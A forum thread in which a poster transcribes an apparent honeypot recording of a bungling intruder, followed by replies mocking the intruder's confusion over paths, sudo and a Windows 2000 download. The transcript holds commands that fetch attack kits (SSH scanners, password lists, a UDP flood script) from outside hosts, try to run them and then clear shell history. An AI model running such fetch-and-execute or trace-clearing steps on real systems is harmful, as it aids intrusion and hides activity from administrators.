Honeypot wtf



  •  For some reason this seems funny to me.



  • www2:~# w
    09:06:10 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
    USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
    root pts/0 10.34.18.5 09:06 0.00s 0.00s 0.00s w
    www2:~# wget
    wget: missing URL
    Usage: wget [OPTION]... [URL]...

    Try wget --help' for more options. www2:~# wget http://fakehlds.com/fakehlds32.tar.gz --2011-01-20 09:06:22-- http://fakehlds.com/fakehlds32.tar.gz Connecting to fakehlds.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 148729 (145K) [application/x-gzip] Saving to:fakehlds32.tar.gz

    100%[======================================>] 148,729 2K/s eta 55s

    2011-01-20 09:06:24 (2 KB/s) - fakehlds32.tar.gz' saved [148729/148729] www2:~# sudo apt-get install ruby1.8 libopenssl-ruby1.8 bash: sudo: command not found www2:~# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme. www2:~# ls -a . .. .debtags .viminfo .aptitude .profile .bashrc fakehlds32.tar.gz www2:~# wget http://203.128.7.10/~admin/ka.tar --2011-01-20 09:07:21-- http://203.128.7.10/~admin/ka.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4884480 (4M) [application/x-tar] Saving to:ka.tar

    100%[======================================>] 4,884,480 446K/s eta 0s

    2011-01-20 09:07:33 (446 KB/s) - ka.tar' saved [4884480/4884480] www2:~# tar xvf ka.tar a/1 a/2 a/3 a/4 a/5 a/a a/common a/gen-pass.sh a/go.sh a/pass_file a/pscan2 a/scam a/secure a/ss a/ssh-scan a/vuln.txt www2:~# rm -rf ka.tar www2:~# cd /var/spool/samba/a bash: cd: /var/spool/samba/a: No such file or directory www2:~# cd /var/spool/samba bash: cd: /var/spool/samba: No such file or directory www2:~# cd /var www2:/var# cd /spool bash: cd: /spool: No such file or directory www2:/var# cd /samba bash: cd: /samba: No such file or directory www2:/var# cd /a bash: cd: /a: No such file or directory www2:/var# cd a bash: cd: a: No such file or directory www2:/var# cd spool www2:/var/spool# cd samba bash: cd: samba: No such file or directory www2:/var/spool# cd a bash: cd: a: No such file or directory www2:/var/spool# chmod +x * www2:/var/spool# ./go.sh 92 bash: ./go.sh: command not found www2:/var/spool# wget http://203.128.7.10/~admin/udppl.tar --2011-01-20 09:09:19-- http://203.128.7.10/~admin/udppl.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10240 (10K) [application/x-tar] Saving to:udppl.tar

    100%[======================================>] 10,240 3K/s eta 2s

    2011-01-20 09:09:20 (3 KB/s) - udppl.tar' saved [10240/10240] www2:/var/spool# tar xvf udppl.tar udp/udp.pl www2:/var/spool# chmod +x * www2:/var/spool# perl udp.pl bash: perl: command not found www2:/var/spool# wget http://203.128.7.10/~admin/k08.tgz --2011-01-20 09:09:51-- http://203.128.7.10/~admin/k08.tgz Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 404 Not Found www2:/var/spool# cd udp www2:/var/spool/udp# perl bash: perl: command not found www2:/var/spool/udp# udp.pl bash: udp.pl: command not found www2:/var/spool/udp# wget http://download.microsoft.com/download/win2000platform /SP/SP3/NT5/EN-US/W2Ksp3.exe --2011-01-20 09:10:20-- http://download.microsoft.com/download/win2000platform/ SP/SP3/NT5/EN-US/W2Ksp3.exe Connecting to download.microsoft.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 130978672 (124M) [application/octet-stream] Saving to:W2Ksp3.exe

    100%[======================================>] 130,978,672 5225K/s eta 0s

    2011-01-20 09:10:45 (5225 KB/s) - W2Ksp3.exe' saved [130978672/130978672] www2:/var/spool/udp# wget http://203.128.7.10/~admin/k08.tgz --2011-01-20 09:11:00-- http://203.128.7.10/~admin/k08.tgz Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 404 Not Found www2:/var/spool/udp# wget http://203.128.7.10/~admin/udppl.tar --2011-01-20 09:11:11-- http://203.128.7.10/~admin/udppl.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10240 (10K) [application/x-tar] Saving to:udppl.tar

    100%[======================================>] 10,240 4K/s eta 1s

    2011-01-20 09:11:12 (4 KB/s) - udppl.tar' saved [10240/10240] www2:/var/spool/udp# tar xvf udppl.tar udp/udp.pl www2:/var/spool/udp# ls -a . .. udp.pl W2Ksp3.exe udppl.tar udp www2:/var/spool/udp# cd udp www2:/var/spool/udp/udp# chmod +x * www2:/var/spool/udp/udp# perl udp.pl bash: perl: command not found www2:/var/spool/udp/udp# wget http://203.128.7.10/~admin/ka.tar --2011-01-20 09:12:13-- http://203.128.7.10/~admin/ka.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4884480 (4M) [application/x-tar] Saving to:ka.tar

    100%[======================================>] 4,884,480 591K/s eta 0s

    2011-01-20 09:12:21 (591 KB/s) - `ka.tar' saved [4884480/4884480]
    www2:/var/spool/udp/udp# tar xvf ka.tar
    a/1
    a/2
    a/3
    a/4
    a/5
    a/a
    a/common
    a/gen-pass.sh
    a/go.sh
    a/pass_file
    a/pscan2
    a/scam
    a/secure
    a/ss
    a/ssh-scan
    a/vuln.txt
    www2:/var/spool/udp/udp# rm -rf ka.tar
    www2:/var/spool/udp/udp# 213.248.54.246
    bash: 213.248.54.246: command not found
    www2:/var/spool/udp/udp# cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool/samba/a
    bash: cd: /var/spool/samba/a: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool
    www2:/var/spool# cd samba
    bash: cd: samba: No such file or directory
    www2:/var/spool# cd ". "
    bash: cd: . : No such file or directory
    www2:/var/spool# cd a
    bash: cd: a: No such file or directory
    www2:/var/spool# cd /a
    bash: cd: /a: No such file or directory
    www2:/var/spool# ifconfig
    eth0 Link encap:Ethernet HWaddr 00:4c:a8:ab:32:f4
    inet addr:10.98.55.4 Bcast:10.98.55.255 Mask:255.255.255.0
    inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
    TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
    collisions:0 txqueuelen:1000
    RX bytes:50588302699 (47.1 GiB) TX bytes:97318807157 (90.6 GiB)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
    TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:355278106 (338.8 MiB) TX bytes:355278106 (338.8 MiB)
    www2:/var/spool#cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool# wget http://fakehlds.com/fakehlds64.tar.gz
    --2011-01-20 09:16:25-- http://fakehlds.com/fakehlds64.tar.gz
    Connecting to fakehlds.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 150995 (147K) [application/x-gzip]
    Saving to: `fakehlds64.tar.gz

    100%[======================================>] 150,995 18K/s eta 7s

    2011-01-20 09:16:26 (18 KB/s) - fakehlds64.tar.gz' saved [150995/150995] www2:/var/spool# sudo apt-get install ruby1.8 libopenssl-ruby1.8 bash: sudo: command not found www2:/var/spool# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme. www2:/var/spool# cd ruby-1.8.7-p72 bash: cd: ruby-1.8.7-p72: No such file or directory www2:/var/spool# tar xzvf ruby-1.8.7-p72.tar.gz tar: ruby-1.8.7-p72.tar.gz: Cannot open: No such file or directory tar: Error is not recoverable: exiting now tar: Child returned status 2 tar: Error exit delayed from previous errors www2:/var/spool# ls -a . .. mail udppl.tar udp fakehlds64.tar.gz www2:/var/spool# perl bash: perl: command not found www2:/var/spool# wget ely.uv.ro/scan.tar.gz --2011-01-20 09:18:18-- http://ely.uv.ro/scan.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget ely.uv.ro/john.tar.gz --2011-01-20 09:18:34-- http://ely.uv.ro/john.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget http://bodylanguage.uv.ro/unixcod.tar.gz --2011-01-20 09:18:55-- http://bodylanguage.uv.ro/unixcod.tar.gz Connecting to bodylanguage.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget www.shoarec.go.ro/udp.pl --2011-01-20 09:19:12-- http://www.shoarec.go.ro/udp.pl Connecting to shoarec.go.ro:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to:udp.pl

    100%[======================================>] 0 2K/s eta -1s

    2011-01-20 09:19:14 (2 KB/s) - `udp.pl' saved [19017/0]
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz
    --2011-01-20 09:19:33-- http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz;
    --2011-01-20 09:19:37-- http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:20:09-- http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:30:51-- http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# history -c
    www2:/var/spool# exit

    Connection to server closed.
    localhost:~# exit



  • @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.



  • @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.



  • @Evo said:

    @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.

    Actually, my favourite part was the complete ignorance of how paths work. Lots and lots and lots of cd commands... with/without a leading slash (obviously doesn't have a clue what that means), removing/adding subfolders to the path because the first cd didn't work, etc...

    (That, or the 6pt font that showed up when I first tried posting the <pre> block.)



  • @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying install ruby because  there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     



  • @Mcoder said:

    @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying install ruby because  there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     

    It was /var/spool/samba. Apparently the cheat sheet he was following assumed that /var/spool/samba was the current path, because then he tried to cd /var/spool/samba/a, which was supposed to be what he just unpackaged with tar.



  •  ...
    perl? not found
    try to download file
    perl? not found
    perl? not found
    download w2ksp3
    download file
    look at directory
    change permissions on directory
    perl? not found
    extract file
    ip address
    wrong directory
    wrong directory
    wrong dircectory
    ...
    check ethernet settings
    same wrong directory
    download another file
    try to install ruby
    perl? not found
    ...

     

    Someone in the comments said that w2k was probably a speed test, but I still don't see what that is supposed to for 403 errors or perl not existing.

     

    In other news how did you get the text?



  • @Chame1eon said:

    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".



  •  @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.



  • @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it. Oh, and I obviously had nothing better to do.



  • @anotherusername said:

    @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     



  • @Chame1eon said:

    @anotherusername said:
    @Chame1eon said:
    @anotherusername said:
    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".
    I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     



  • @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.



  • @Ronald said:

    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.



  • @Zemm said:

    @Ronald said:
    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    I never much liked putting VB inside Excel spreadsheets. It feels dirty and oh-so-wrong. The only spreadsheet I've done that to had to pull a page from the Internet and screen scrape some values off it, and Excel's built-in data import wizard was woefully inadequate for the task. And if the security settings didn't allow scripting (which the default won't), everything on the spreadsheet still worked except for the button that pulled those values.



  • @anotherusername said:

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    If only we could still harness the power of the flight simulator in excel 97 all would be right


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.